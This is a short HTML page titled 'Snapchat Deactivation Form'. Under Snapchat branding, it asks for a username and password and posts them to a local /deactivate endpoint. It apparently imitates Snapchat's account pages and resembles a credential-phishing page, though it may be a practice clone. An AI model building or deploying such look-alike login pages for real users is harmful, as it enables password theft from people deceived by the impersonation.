<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Snapchat Deactivation Form</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            justify-content:left;
            align-items: center;
            display: flex;
            background-image: url(sna.png);
            background-position: center;
            background-repeat: no-repeat;
            background-size: 500px;
            padding-bottom: 200px;
            
        }
      form {
            background-color: #ffffff;
            padding: 20px;
            border-radius: 28px;
            box-shadow: 0 0 10px rgba(22, 22, 22, 0.1);
            width: 500px
            ;
            border-color: rgb(8, 8, 8);
            height: 350px;}
    
        
    </style>
</head>
<body>
    <div class="container">
        <h2>Deactivate Snapchat Account</h2>
        <form action="/deactivate" method="POST">
            Username : <br><br>
            <input type="text" id="username" name="username" required><br><br>
            Password:  <br><br>
            <input type="password" id="password" name="password" required> <br><br>
            <button type="submit">Deactivate</button>
            <p style="color: rgb(133, 179, 240);">forget your password?</p><br>
            <a href="des.html">Deactivate with you email account</a>
        </form>
    </div>
</body>
</html>
